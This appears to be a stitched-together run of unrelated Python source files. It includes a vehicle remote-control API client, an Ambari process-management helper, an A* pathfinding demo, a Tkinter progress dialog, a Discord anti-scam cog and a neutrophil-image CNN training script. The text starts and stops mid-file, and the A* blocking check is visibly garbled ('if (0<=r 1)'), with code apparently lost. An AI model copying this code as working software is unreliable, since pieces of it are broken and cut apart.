vehicle.front_right_seat_heater_is_on = get_child_value( state, "vehicleStatus.seatHeaterVentState.frSeatHeatState" ) vehicle.rear_left_seat_heater_is_on = get_child_value( state, "vehicleStatus.seatHeaterVentState.rlSeatHeatState" ) vehicle.rear_right_seat_heater_is_on = get_child_value( state, "vehicleStatus.seatHeaterVentState.rrSeatHeatState" ) vehicle.is_locked = get_child_value(state, "vehicleStatus.doorLock") vehicle.front_left_door_is_open = get_child_value( state, "vehicleStatus.doorStatus.frontLeft" ) vehicle.front_right_door_is_open = get_child_value( state, "vehicleStatus.doorStatus.frontRight" ) vehicle.back_left_door_is_open = get_child_value( state, "vehicleStatus.doorStatus.backLeft" ) vehicle.back_right_door_is_open = get_child_value( state, "vehicleStatus.doorStatus.backRight" ) vehicle.hood_is_open = get_child_value(state, "vehicleStatus.doorStatus.hood") vehicle.trunk_is_open = get_child_value(state, "vehicleStatus.doorStatus.trunk") vehicle.ev_battery_percentage = get_child_value( state, "vehicleStatus.evStatus.batteryStatus" ) vehicle.ev_battery_is_charging = get_child_value( state, "vehicleStatus.evStatus.batteryCharge" ) vehicle.ev_battery_is_plugged_in = get_child_value( state, "vehicleStatus.evStatus.batteryPlugin" ) vehicle.ev_driving_distance = ( get_child_value( state, "vehicleStatus.evStatus.drvDistance.0.rangeByFuel.evModeRange.value", ), DISTANCE_UNITS[3], ) vehicle.ev_estimated_current_charge_duration = ( get_child_value(state, "vehicleStatus.evStatus.remainTime2.atc.value"), "m", ) vehicle.ev_estimated_fast_charge_duration = ( get_child_value(state, "vehicleStatus.evStatus.remainTime2.etc1.value"), "m", ) vehicle.ev_estimated_portable_charge_duration = ( get_child_value(state, "vehicleStatus.evStatus.remainTime2.etc2.value"), "m", ) vehicle.ev_estimated_station_charge_duration = ( get_child_value(state, "vehicleStatus.evStatus.remainTime2.etc3.value"), "m", ) vehicle.fuel_driving_distance = ( get_child_value( state, "vehicleStatus.distanceToEmpty.value", ), DISTANCE_UNITS[3], ) vehicle.fuel_level_is_low = get_child_value(state, "vehicleStatus.lowFuelLight") vehicle.fuel_level = get_child_value(state, "vehicleStatus.fuelLevel") vehicle.air_control_is_on = get_child_value(state, "vehicleStatus.airCtrlOn") vehicle.location = ( get_child_value(state, "vehicleLocation.coord.lat"), get_child_value(state, "vehicleLocation.coord.lon"), get_child_value(state, "vehicleLocation.syncDate.utc"), ) vehicle.next_service_distance = ( get_child_value(state, "nextService.value"), DISTANCE_UNITS[get_child_value(state, "nextService.unit")], ) vehicle.data = state def get_last_updated_at(self, value) -> dt.datetime: m = re.match(r"(\d{4})(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})", value) _LOGGER.debug(f"{DOMAIN} - last_updated_at - before {value}") value = dt.datetime( year=int(m.group(1)), month=int(m.group(2)), day=int(m.group(3)), hour=int(m.group(4)), minute=int(m.group(5)), second=int(m.group(6)), tzinfo=self.data_timezone, ) _LOGGER.debug(f"{DOMAIN} - last_updated_at - after {value}") return value def _get_cached_vehicle_state(self, token: Token, vehicle: Vehicle) -> dict: url = self.API_URL + "cmm/gvi" body = { "vehicleConfigReq": { "airTempRange": "0", "maintenance": "1", "seatHeatCoolOption": "0", "vehicle": "1", "vehicleFeature": "0", }, "vehicleInfoReq": { "drivingActivty": "0", "dtc": "1", "enrollment": "1", "functionalCards": "0", "location": "1", "vehicleStatus": "1", "weather": "0", }, "vinKey": [vehicle.key], } response = self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body, vehicle=vehicle ) response_body = response.json() vehicle_status = response_body["payload"]["vehicleInfoList"][0][ "lastVehicleInfo" ]["vehicleStatusRpt"]["vehicleStatus"] vehicle_data = { "vehicleStatus": vehicle_status, "odometer": { "value": float( response_body["payload"]["vehicleInfoList"][0]["vehicleConfig"][ "vehicleDetail" ]["vehicle"]["mileage"] ), "unit": 3, }, "nextService": { "value": float( response_body["payload"]["vehicleInfoList"][0]["vehicleConfig"][ "maintenance" ]["nextServiceMile"] ), "unit": 3, }, "vehicleLocation": response_body["payload"]["vehicleInfoList"][0][ "lastVehicleInfo" ]["location"], } if vehicle_status.get("evStatus"): vehicle_status["evStatus"]["remainTime2"] = { "atc": vehicle_status["evStatus"]["remainChargeTime"][0]["timeInterval"] } if vehicle_status.get("tirePressure"): vehicle_status["tirePressureLamp"] = { "tirePressureLampAll": vehicle_status["tirePressure"]["all"] } climate_data = vehicle_status["climate"] vehicle_status["airCtrlOn"] = climate_data["airCtrl"] vehicle_status["defrost"] = climate_data["defrost"] vehicle_status["sideBackWindowHeat"] = climate_data["heatingAccessory"][ "rearWindow" ] vehicle_status["sideMirrorHeat"] = climate_data["heatingAccessory"][ "sideMirror" ] vehicle_status["steerWheelHeat"] = climate_data["heatingAccessory"][ "steeringWheel" ] vehicle_status["airTemp"] = climate_data["airTemp"] return vehicle_data def get_location(self, token: Token, vehicle_id: str) -> None: pass def force_refresh_vehicle_state(self, token: Token, vehicle: Vehicle) -> None: url = self.API_URL + "rems/rvs" body = { "requestType": 0 # value of 1 would return cached results instead of forcing update } self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body, vehicle=vehicle ) def check_last_action_status(self, token: Token, vehicle: Vehicle, action_id: str): url = self.API_URL + "cmm/gts" body = {"xid": action_id} response = self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body, vehicle=vehicle ) response_json = response.json() last_action_completed = all( v == 0 for v in response_json["payload"].values() ) return last_action_completed def lock_action(self, token: Token, vehicle: Vehicle, action) -> str: _LOGGER.debug(f"Action for lock is: {action}") if action == VEHICLE_LOCK_ACTION.LOCK: url = self.API_URL + "rems/door/lock" _LOGGER.debug(f"Calling Lock") elif action == VEHICLE_LOCK_ACTION.UNLOCK: url = self.API_URL + "rems/door/unlock" _LOGGER.debug(f"Calling unlock") response = self.get_request_with_logging_and_active_session( token=token, url=url, vehicle=vehicle ) return response.headers["Xid"] def start_climate( self, token: Token, vehicle: Vehicle, options: ClimateRequestOptions ) -> str: url = self.API_URL + "rems/start" if options.set_temp < 62: options.set_temp = "LOW" elif options.set_temp > 82: options.set_temp = "HIGH" body = { "remoteClimate": { "airCtrl": options.climate, "airTemp": { "unit": 1, "value": str(options.set_temp), }, "defrost": options.defrost, "heatingAccessory": { "rearWindow": int(options.heating), "sideMirror": int(options.heating), "steeringWheel": int(options.heating), }, "ignitionOnDuration": { "unit": 4, "value": options.duration, }, } } response = self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body, vehicle=vehicle ) return response.headers["Xid"] def stop_climate(self, token: Token, vehicle: Vehicle)-> str: url = self.API_URL + "rems/stop" response = self.get_request_with_logging_and_active_session( token=token, url=url ) return response.headers["Xid"] def start_charge(self, token: Token, vehicle: Vehicle)-> str: url = self.API_URL + "evc/charge" body = {"chargeRatio": 100} response = self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body ) return response.headers["Xid"] def stop_charge(self, token: Token, vehicle: Vehicle)-> str: url = self.API_URL + "evc/cancel" response = self.get_request_with_logging_and_active_session( token=token, url=url, vehicle=vehicle ) return response.headers["Xid"] def set_charge_limits(self, token: Token, vehicle: Vehicle, ac_limit: int, dc_limit: int)-> str: url = self.API_URL + "evc/sts" body = { "targetSOClist": [ { "plugType": 0, "targetSOClevel": dc_limit, }, { "plugType": 1, "targetSOClevel": ac_limit, }, ] } response = self.post_request_with_logging_and_active_session( token=token, url=url, json_body=body, vechile=vehicle ) return response.headers["Xid"] chaserhkj/ModPhyLabJosephson_effect/vt2.py10-100 from matplotlib import pyplot as plt x = [] y = [] with open('data3.txt') as f: line = f.readline() while line: x.append(float(line.split(',')[0])) y.append(float(line.split(',')[1])) line = f.readline() y = [i/50 for i in y] plt.xlabel("I/mA") plt.ylabel("U/$\mu$V") plt.plot(x, y) plt.savefig("vt2.pdf") plt.show() Syndra/Ambari-source1-10 #!/usr/bin/env python """ Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import os, pwd, grp from resource_management.core.resources.system import Execute, File from resource_management.core.logger import Logger from resource_management.libraries.functions.format import format from resource_management.libraries.functions.get_user_call_output import get_user_call_output from resource_management.libraries.functions.show_logs import show_logs #from resource_management.libraries.resources.hdfs_resource import HdfsResource from ambari_commons.constants import AMBARI_SUDO_BINARY def package_dir(): return os.path.realpath(__file__).split('/package')[0] + '/package/' def create_linux_user(user, group): sudo = AMBARI_SUDO_BINARY try: pwd.getpwnam(user) except KeyError: Execute(format("{sudo} useradd ") + user, logoutput=True) try: grp.getgrnam(group) except KeyError: Execute(format("{sudo} groupadd ") + group, logoutput=True) def create_hdfs_dirs(user, group, dirs): import jnbg_params as params for dir, perms in dirs: params.HdfsResource(dir, type = "directory", action = "create_on_execute", owner = user, group = group, mode = int(perms, 8) ) params.HdfsResource(None, action="execute") def stop_process(pid_file, user, log_dir): """ Kill the process by pid file, then check the process is running or not. If the process is still running after the kill command, try to kill with -9 option (hard kill) """ sudo = AMBARI_SUDO_BINARY pid = get_user_call_output(format("cat {pid_file}"), user=user, is_checked_call=False)[1] process_id_exists_command = format("ls {pid_file} >/dev/null 2>&1 && ps -p {pid} >/dev/null 2>&1") kill_cmd = format("{sudo} kill {pid}") Execute(kill_cmd, not_if=format("! ({process_id_exists_command})")) wait_time = 5 hard_kill_cmd = format("{sudo} kill -9 {pid}") Execute(hard_kill_cmd, not_if=format("! ({process_id_exists_command}) || ( sleep {wait_time} && ! ({process_id_exists_command}) )"), ignore_failures = True) try: Execute(format("! ({process_id_exists_command})"), tries=20, try_sleep=3) except: show_logs(log_dir, user) raise File(pid_file, action="delete") import heapq STATUS_NO = 0 STATUS_OPEN = 1 STATUS_CLOSE = 2 DIR_8_LIST = [ [1,-1], [1, 0], [1, 1], [0,-1], [0, 1], [-1,-1], [-1,0,], [-1,1], ] DIR_4_LIST = [ [-1,0], [1, 0], [0,-1], [0, 1], ] COLOR_DESC = { 'black':30, 'red':31, 'yellow':33, 'blue':34, 'green':32, 'purple':35, 'cyan':36, 'white':37, } def color_pack(s, color): return "\033[%dm%s\033[0m"%(COLOR_DESC.get(color,37),s) class CNode: def __init__(self, row, col): self.m_Row = row self.m_Col = col self.m_Mark = '.' self.m_Status = STATUS_NO self.m_Parent = None self.m_gScore = 0 self.m_fScore = 0 def restore(self): self.m_Status = STATUS_NO self.m_Parent = None self.m_gScore = 0 self.m_fScore = 0 def is_goalnode(self): return self.m_Mark == 'g' def is_startnode(self): return self.m_Mark == 's' def is_open(self): return self.m_Status == STATUS_OPEN def is_close(self): return self.m_Status == STATUS_CLOSE class CMap: def __init__(self, map_list): self.m_StartPos = None self.m_GoalPos = None self.m_MaxCol = len(map_list[0]) self.m_MaxRow = len(map_list) self.m_NodesList = [[None]*self.m_MaxCol for i in range(self.m_MaxRow)] for i in xrange(self.m_MaxRow): for j in xrange(self.m_MaxCol): mark = map_list[i][j] if mark != '1': self.m_NodesList[i][j] = CNode(i,j) print color_pack("init map[%dx%d] ok!"%(self.m_MaxRow,self.m_MaxCol), "yellow") def set_config(self, stapos, goalpos, diagonal_able=False, max_depth=None): last_sta_node = self.get_start_node() if last_sta_node: last_sta_node.m_Mark = '.' self.m_StartPos = stapos start_node = self.get_start_node() start_node.m_Mark = 's' last_goal_node = self.get_goal_node() if last_goal_node: last_goal_node.m_Mark = '.' self.m_GoalPos = goalpos goal_node = self.get_goal_node() goal_node.m_Mark = 'g' if max_depth: self.m_MaxDepth = max_depth else: self.m_MaxDepth = self.m_MaxCol*self.m_MaxRow self.m_DiagonalAble = diagonal_able def get_start_node(self): if self.m_StartPos: sr,sc = self.m_StartPos return self.m_NodesList[sr][sc] def get_goal_node(self): if self.m_GoalPos: gr,gc = self.m_GoalPos return self.m_NodesList[gr][gc] def is_block(self, r, c): if (0<=r 1): return parent.m_gScore + 14 else: return parent.m_gScore + 10 return 0 def compute_h(self, node): gr,gc = self.m_GoalPos dr = abs(node.m_Row - gr) dc = abs(node.m_Col - gc) if self.m_DiagonalAble: if dr > dc: # 1:1:sqrt(2) return (dr-dc)*10 + 14*dc else: return (dc-dr)*10 + 14*dr else: return 10*(dr+dc) def add_open(self, node, parent=None): self.m_CurDepth = self.m_CurDepth + 1 node.m_Status = STATUS_OPEN node.m_Parent = parent node.m_gScore = self.compute_g(node, parent) node.m_hScore = self.compute_h(node) node.m_fScore = node.m_gScore + node.m_hScore heapq.heappush(self.m_OpenList, (node.m_fScore,node)) if self.m_CurDepth >= self.m_MaxDepth: goal_node = self.get_goal_node() if not goal_node in self.m_OpenList: return True def add_close(self, node): node.m_Status = STATUS_CLOSE self.m_CloseList.append(node) def find_path(self): #A* pathfinding self.m_OpenList = [] self.m_CloseList = [] self.m_CurDepth = 0 dir_list = None if self.m_DiagonalAble: dir_list = DIR_8_LIST else: dir_list = DIR_4_LIST for i in xrange(self.m_MaxRow): for j in xrange(self.m_MaxCol): if self.m_NodesList[i][j] != None: self.m_NodesList[i][j].restore() start_node = self.get_start_node() self.add_open(start_node) while len(self.m_OpenList) > 0: current = heapq.heappop(self.m_OpenList)[1] if current.is_goalnode(): self.reconstruct_path(current) return self.add_close(current) for d in dir_list: nr = d[0] + current.m_Row nc = d[1] + current.m_Col if self.is_block(nr, nc): continue neighbor = self.m_NodesList[nr][nc] if neighbor.is_close(): continue if neighbor.is_open(): tentative_gscore = self.compute_g(neighbor, current) if tentative_gscore < neighbor.m_gScore: neighbor.m_Parent = current neighbor.m_gScore = tentative_gscore neighbor.m_fScore = tentative_gscore + neighbor.m_hScore else: if self.m_CurDepth < self.m_MaxDepth: if self.add_open(neighbor, current): lastnode = self.m_CloseList[-1] self.reconstruct_path(lastnode) return self.reconstruct_path(None) def reconstruct_path(self, lastnode): map_list = [[color_pack('0','green')]*self.m_MaxCol for i in range(self.m_MaxRow)] for i in xrange(self.m_MaxRow): for j in xrange(self.m_MaxCol): if self.m_NodesList[i][j] != None: if self.m_NodesList[i][j].is_startnode(): map_list[i][j] = color_pack('s','blue') elif self.m_NodesList[i][j].is_goalnode(): map_list[i][j] = color_pack('g','yellow') else: map_list[i][j] = color_pack('1','red') msg = "%d dir search cost depth:%d limit depth:%d "%(8 if self.m_DiagonalAble else 4, self.m_CurDepth, self.m_MaxDepth) if lastnode == None: msg = msg + color_pack("result:can,t access[failed]", "black") else: current = lastnode if lastnode.is_goalnode(): msg = msg + color_pack("result:get it[succeed]", "blue") else: msg = msg + color_pack("result:depth limit[failed]", "cyan") while current: if not current.is_startnode() and not current.is_goalnode(): map_list[current.m_Row][current.m_Col] = color_pack("*",'green') current = current.m_Parent print msg for v in map_list: print " ".join(v) map_data = [ "1....1111", "..1111...", "1...111.1", "...1...1.", "...11....", "1..1.1111", "1....1..1", ] pf = CMap(map_data) #4 dir search pf.set_config((1,1),(5,4)) pf.find_path() #8 dir search pf.set_config((1,1),(1,6), True) pf.find_path() #depth limit search pf.set_config((1,1),(1,6), True, 20) pf.find_path() #cant access pf.set_config((1,1),(1,6)) pf.find_path() pf.set_config((1,1),(6,6),True) pf.find_path()1-10 def repro(): return kscottz/owi_armsetup.py0 ## ! DO NOT MANUALLY INVOKE THIS setup.py, USE CATKIN INSTEAD from distutils.core import setup from catkin_pkg.python_setup import generate_distutils_setup # fetch values from package.xml setup_args = generate_distutils_setup( packages=['owi_arm'], package_dir={'': 'src'}, requires=['rospy',"std_msgs", "sensor_msgs", './scripts/cmd_robot.py','./scripts/owi_joystick_node.py','./scripts/toy_joint_states.py','./scripts/arm_controller.py'] ) setup(**setup_args) flipper/application/progress.py import flipper import flipper.application from flipper.application.spinning_icon import SPINNING_ICON from multiprocessing import JoinableQueue as Queue from multiprocessing import Process from queue import Empty import tkinter as TK # Note: Because of how memory is managed in Python the _worker_thread # works with a copy of the main memory. Therefore any changes it makes to the # objects involved, such as caching results, will NOT be done to the origional # objects. Hence all such changes will be lost when the thread completes. def _worker_thread(function, args, answer): try: result = function(*args) answer.put(result) except Exception as error: answer.put(error) # Return any errors that occur. class ProgressApp: def __init__(self, host_app_parent=None): if host_app_parent is None: host_app_parent = TK._default_root self.host_app_parent = host_app_parent self.parent = TK.Toplevel(self.host_app_parent) self.parent.withdraw() # Hide self while we set up the geometry. self.parent.title('flipper: Computing...') self.parent.protocol('WM_DELETE_WINDOW', self.cancel) # To catch when users click the 'x' to close the window. self.progress = flipper.application.AnimatedCanvas(self.parent, frames_contents=SPINNING_ICON) self.progress.pack(padx=130, pady=5) self.button_cancel = TK.Button(self.parent, text='Cancel', command=self.cancel) self.button_cancel.pack(padx=5, pady=5, side='right') self.running = False self.worker = None self.parent.resizable(0, 0) self.parent.withdraw() self.parent.lift() self.button_cancel.focus() self.parent.update_idletasks() x = self.host_app_parent.winfo_rootx() + self.host_app_parent.winfo_width() // 2 - self.parent.winfo_width() // 2 y = self.host_app_parent.winfo_rooty() + self.host_app_parent.winfo_height() // 2 - self.parent.winfo_height() // 2 self.parent.update_idletasks() self.parent.geometry('+%d+%d' % (x, y)) self.parent.deiconify() self.parent.transient(self.host_app_parent) # Lock this window on top. self.parent.grab_set() # Make sure this window always has focus. self.parent.update_idletasks() def cancel(self): if self.running: self.running = False self.worker.terminate() self.host_app_parent.focus_set() self.parent.destroy() def apply(self, function, args=None): if args is None: args = [] answer = Queue() self.worker = Process(target=_worker_thread, args=(function, args, answer)) self.worker.deamon = True # Making the worker a deamon of this thread stops it if the main thread is killed. self.running = True self.worker.start() while self.running: # So long as the calculation hasn't been aborted. try: result = answer.get(True, 0.05) # Try and get some more information. except Empty: self.host_app_parent.update() else: self.cancel() if isinstance(result, Exception): raise result else: return result # If we reach this point then the calculation was aborted. raise flipper.AbortError def apply_progression(function, args=None, host_app_parent=None): return ProgressApp(host_app_parent).apply(function, args) from django.apps import AppConfig class IchingdbConfig(AppConfig): name = 'ichingdb' 0 import copy import discord from discord.ext import commands from libs.classes import Zbot, MyContext from libs.antiscam import AntiScamAgent, Message from fcts import checks def is_immune(member: discord.Member) -> bool: "Check if a member is immune to the anti-scam feature" return (member.bot or member.guild_permissions.administrator or member.guild_permissions.manage_messages or member.guild_permissions.manage_guild) class AntiScam(commands.Cog): "Anti scam feature which read every message and detect if they are malicious" def __init__(self, bot: Zbot): self.bot = bot self.file = "antiscam" self.agent = AntiScamAgent() async def send_bot_log(self, msg: discord.Message): "Send a log to the bot internal log channel" emb = discord.Embed(title="Scam message deleted", description=msg.content, color=discord.Color.red()) emb.set_author(name=msg.author, icon_url=msg.author.display_avatar) emb.set_footer(text=f"{msg.guild.name} ({msg.guild.id})" if msg.guild else "No guild") await self.bot.send_embed([emb]) @commands.group(name="antiscam") async def antiscam(self, ctx: MyContext): """Everything related to the antiscam feature ..Doc moderator.html#anti-scam""" @antiscam.command(name="test") @commands.cooldown(5, 30, commands.BucketType.user) async def antiscam_test(self, ctx: MyContext, *, msg: str): """Test the antiscam feature with a given message ..Example antiscam test free nitro for everyone at bit.ly/tomato""" data = Message.from_raw(msg, 0) pred = self.agent.predict_bot(data) await ctx.send(pred.to_string(self.agent.categories) + f"\nURL risk score: {data.url_score}") @antiscam.command(name="enable") @commands.guild_only() @commands.check(checks.has_manage_guild) async def antiscam_enable(self, ctx: MyContext): """Enable the anti scam feature in your server ..Doc moderator.html#anti-scam""" msg: discord.Message = copy.copy(ctx.message) msg.content = f'{ctx.prefix}config change anti_scam true' new_ctx = await self.bot.get_context(msg) await self.bot.invoke(new_ctx) @antiscam.command(name="disable") @commands.guild_only() @commands.check(checks.has_manage_guild) async def antiscam_disable(self, ctx: MyContext): """Disable the anti scam feature in your server ..Doc moderator.html#anti-scam""" msg: discord.Message = copy.copy(ctx.message) msg.content = f'{ctx.prefix}config change anti_scam false' new_ctx = await self.bot.get_context(msg) await self.bot.invoke(new_ctx) @commands.Cog.listener() async def on_message(self, msg: discord.Message): "Check any message for scam dangerousity" if not msg.guild or len(msg.content) < 10 or is_immune(msg.author) or await self.bot.potential_command(msg): return await self.bot.wait_until_ready() if not await self.bot.get_config(msg.guild.id, "anti_scam"): return message: Message = Message.from_raw(msg.content, len(msg.mentions)) if len(message.normd_message) < 3: return result = self.agent.predict_bot(message) if result.result > 1: message.category = 0 print("GOT", message.message, result.probabilities[2]) if result.probabilities[1] < 0.005: # if probability of not being harmless is less than 0.5% try: await msg.delete() # try to delete it, silently fails except discord.Forbidden: pass await self.send_bot_log(msg) self.bot.dispatch("antiscam_delete", msg, result) # msg_id = await bot.insert_msg(message) # await bot.send_report(msg, msg_id, message) elif result.probabilities[1] < 0.3: self.bot.dispatch("antiscam_warn", msg, result) async def setup(bot): await bot.add_cog(AntiScam(bot)) 1-10 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Jun 14 16:15:18 2017 @authors: lwk, RH """ import matplotlib matplotlib.use('Agg') import os import sys import numpy as np import tensorflow as tf import HE_data_input import cnnm import cnng import cnni import cnnt import cnnir1 import cnnir2 import cnnva import cnnv16 import cnnv19 import pandas as pd import sklearn as skl import matplotlib.pyplot as plt from PIL import Image import cv2 import Sample_prep dirr = sys.argv[1] bs = sys.argv[2] iter = sys.argv[3] md = sys.argv[4] bs = int(bs) iter = int(iter) IMG_DIM = 299 INPUT_DIM = [IMG_DIM ** 2 * 3, IMG_DIM, IMG_DIM] HYPERPARAMS = { "batch_size": bs, "dropout": 0.8, "learning_rate": 1E-4 } MAX_ITER = iter MAX_EPOCHS = np.inf img_dir = '../Neutrophil/All_Tiles_final' LOG_DIR = "../Neutrophil/{}".format(dirr) METAGRAPH_DIR = "../Neutrophil/{}".format(dirr) data_dir = "../Neutrophil/{}/data".format(dirr) out_dir = "../Neutrophil/{}/out".format(dirr) def counters(totlist_dir): trlist = pd.read_csv(totlist_dir + '/tr_sample.csv', header=0) telist = pd.read_csv(totlist_dir + '/te_sample.csv', header=0) trcc = len(trlist['label']) - 1 tecc = len(telist['label']) - 1 trnumm = int(trcc/5000)+1 tenumm = int(tecc/5000)+1 return trcc, tecc, trnumm, tenumm def loader(totlist_dir): dat = np.empty((0, int(299 ** 2 * 3)), dtype='uint8') tile_lab = [] trlist = pd.read_csv(totlist_dir+'/tr_sample.csv', header=0) telist = pd.read_csv(totlist_dir+'/te_sample.csv', header=0) f = 1 for index, row in trlist.iterrows(): image = Image.open(row['path']) pix = np.array(image)[:, :, 0:3] dat = np.vstack([dat, pix.flatten()]) tile_lab.append(row['label']) if len(tile_lab) == 5000 or index == len(trlist['label']) - 1: np.savetxt(data_dir + '/data_{}.txt'.format(f), dat, fmt='%i', delimiter='\t') np.savetxt(data_dir + '/lab_{}.txt'.format(f), tile_lab, fmt='%i', delimiter='\t') dat = np.empty((0, int(299 ** 2 * 3)), dtype='uint8') tile_lab = [] f += 1 dat = np.empty((0, int(299 ** 2 * 3)), dtype='uint8') tile_lab = [] g = 1 for index, row in telist.iterrows(): image = Image.open(row['path']) pix = np.array(image)[:, :, 0:3] dat = np.vstack([dat, pix.flatten()]) tile_lab.append(row['label']) if len(tile_lab) == 5000 or index == len(telist['label']) - 1: np.savetxt(data_dir + '/data_test_{}.txt'.format(g), dat, fmt='%i', delimiter='\t') np.savetxt(data_dir + '/lab_test_{}.txt'.format(g), tile_lab, fmt='%i', delimiter='\t') dat = np.empty((0, int(299 ** 2 * 3)), dtype='uint8') tile_lab = [] g += 1 # to_load = def iter_loadtxt(filename, delimiter=',', skiprows=0, dtype=float): def iter_func(): with open(filename, 'r') as infile: for _ in range(skiprows): next(infile) for line in infile: line = line.rstrip().split(delimiter) for item in line: yield dtype(item) iter_loadtxt.rowlength = len(line) data = np.fromiter(iter_func(), dtype=dtype) data = data.reshape((-1, iter_loadtxt.rowlength)) return data def load_HE_data(train_dat_name, train_lab_name, valid_dat_name, valid_lab_name): train_dat = iter_loadtxt(train_dat_name, dtype=int, delimiter='\t') valid_dat = iter_loadtxt(valid_dat_name, dtype=int, delimiter='\t') train_lab = iter_loadtxt(train_lab_name, dtype=int, delimiter='\t') valid_lab = iter_loadtxt(valid_lab_name, dtype=int, delimiter='\t') size = train_lab.shape[0] class DataSets(object): pass data_sets = DataSets() data_sets.train = HE_data_input.DataSet(images=train_dat, labels=train_lab, reshape=False) data_sets.validation = HE_data_input.DataSet(images=valid_dat, labels=valid_lab, reshape=False) return data_sets, size def metrics(pdx, tl, path, name): pdx = np.asmatrix(pdx) prl = (pdx[:,1] > 0.5).astype('uint8') prl = pd.DataFrame(prl, columns = ['Prediction']) out = pd.DataFrame(pdx, columns = ['neg_score', 'pos_score']) outtl = pd.DataFrame(tl, columns = ['True_label']) out = pd.concat([out,prl,outtl], axis=1) out.to_csv("../Neutrophil/{}/out/{}.csv".format(path, name), index=False) accu = 0 tott = out.shape[0] for idx, row in out.iterrows(): if row['Prediction'] == row['True_label']: accu += 1 accur = accu/tott accur = round(accur,2) print('Accuracy:') print(accur) y_score = pdx[:,1] auc = skl.metrics.roc_auc_score(tl, y_score) print('ROC-AUC:') print(skl.metrics.roc_auc_score(tl, y_score)) fpr, tpr, _ = skl.metrics.roc_curve(tl, y_score) plt.figure() lw = 2 plt.plot(fpr, tpr, color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % auc) plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--') plt.xlim([0.0, 1.0]) plt.ylim([0.0, 1.05]) plt.xlabel('False Positive Rate') plt.ylabel('True Positive Rate') plt.title('ROC of {}'.format(name)) plt.legend(loc="lower right") plt.savefig("../Neutrophil/{}/out/{}_ROC.png".format(path, name)) average_precision = skl.metrics.average_precision_score(tl, y_score) print('Average precision-recall score: {0:0.2f}'.format(average_precision)) plt.figure() precision, recall, _ = skl.metrics.precision_recall_curve(tl, y_score) plt.step(recall, precision, color='b', alpha=0.2, where='post') plt.fill_between(recall, precision, step='post', alpha=0.2, color='b') plt.xlabel('Recall') plt.ylabel('Precision') plt.ylim([0.0, 1.05]) plt.xlim([0.0, 1.0]) plt.title('{} Precision-Recall curve: AP={:0.2f}; Accu={}'.format(name, average_precision, accur)) plt.savefig("../Neutrophil/{}/out/{}_PRC.png".format(path, name)) def py_returnCAMmap(activation, weights_LR): n_feat, w, h, n = activation.shape act_vec = np.reshape(activation, [n_feat, w*h]) n_top = weights_LR.shape[0] out = np.zeros([w, h, n_top]) for t in range(n_top): weights_vec = np.reshape(weights_LR[t], [1, weights_LR[t].shape[0]]) heatmap_vec = np.dot(weights_vec,act_vec) heatmap = np.reshape( np.squeeze(heatmap_vec) , [w, h]) out[:,:,t] = heatmap return out def im2double(im): return cv2.normalize(im.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX) def py_map2jpg(imgmap, rang, colorMap): if rang is None: rang = [np.min(imgmap), np.max(imgmap)] heatmap_x = np.round(imgmap*255).astype(np.uint8) return cv2.applyColorMap(heatmap_x, cv2.COLORMAP_JET) def CAM(net, w, pred, x, y, path, name): DIR = "../Neutrophil/{}/out/{}_posimg".format(path, name) DIRR = "../Neutrophil/{}/out/{}_negimg".format(path, name) try: os.mkdir(DIR) except(FileExistsError): pass try: os.mkdir(DIRR) except(FileExistsError): pass pdx = np.asmatrix(pred) prl = (pdx[:,1] > 0.5).astype('uint8') for ij in range(len(y)): if prl[ij] == 0: if y[ij] == 0: ddt = 'Correct' else: ddt = 'Wrong' weights_LR = w activation_lastconv = np.array([net[ij]]) weights_LR = weights_LR.T activation_lastconv = activation_lastconv.T topNum = 1 # generate heatmap for top X prediction results scores = pred[ij] scoresMean = np.mean(scores, axis=0) ascending_order = np.argsort(scoresMean) IDX_category = ascending_order[::-1] # [::-1] to sort in descending order curCAMmapAll = py_returnCAMmap(activation_lastconv, weights_LR[[0], :]) for kk in range(topNum): curCAMmap_crops = curCAMmapAll[:, :, kk] curCAMmapLarge_crops = cv2.resize(curCAMmap_crops, (299, 299)) curHeatMap = cv2.resize(im2double(curCAMmapLarge_crops), (299, 299)) # this line is not doing much curHeatMap = im2double(curHeatMap) curHeatMap = py_map2jpg(curHeatMap, None, 'jet') xim = x[ij].reshape(-1, 3) xim1 = xim[:, 0].reshape(-1, 299) xim2 = xim[:, 1].reshape(-1, 299) xim3 = xim[:, 2].reshape(-1, 299) image = np.empty([299,299,3]) image[:, :, 0] = xim1 image[:, :, 1] = xim2 image[:, :, 2] = xim3 a = im2double(image) * 255 b = im2double(curHeatMap) * 255 curHeatMap = a * 0.6 + b * 0.4 ab = np.hstack((a,b)) full = np.hstack((curHeatMap, ab)) # imname = DIRR + '/' + ddt + str(ij) + '.png' # imname1 = DIRR + '/' + ddt + str(ij) + '_img.png' # imname2 = DIRR+ '/' + ddt + str(ij) + '_hm.png' imname3 = DIRR + '/' + ddt + str(ij) + '_full.png' # cv2.imwrite(imname, curHeatMap) # cv2.imwrite(imname1, a) # cv2.imwrite(imname2, b) cv2.imwrite(imname3, full) else: if y[ij] == 1: ddt = 'Correct' else: ddt = 'Wrong' weights_LR = w activation_lastconv = np.array([net[ij]]) weights_LR = weights_LR.T activation_lastconv = activation_lastconv.T topNum = 1 # generate heatmap for top X prediction results scores = pred[ij] scoresMean = np.mean(scores, axis=0) ascending_order = np.argsort(scoresMean) IDX_category = ascending_order[::-1] # [::-1] to sort in descending order curCAMmapAll = py_returnCAMmap(activation_lastconv, weights_LR[[1], :]) for kk in range(topNum): curCAMmap_crops = curCAMmapAll[:, :, kk] curCAMmapLarge_crops = cv2.resize(curCAMmap_crops, (299, 299)) curHeatMap = 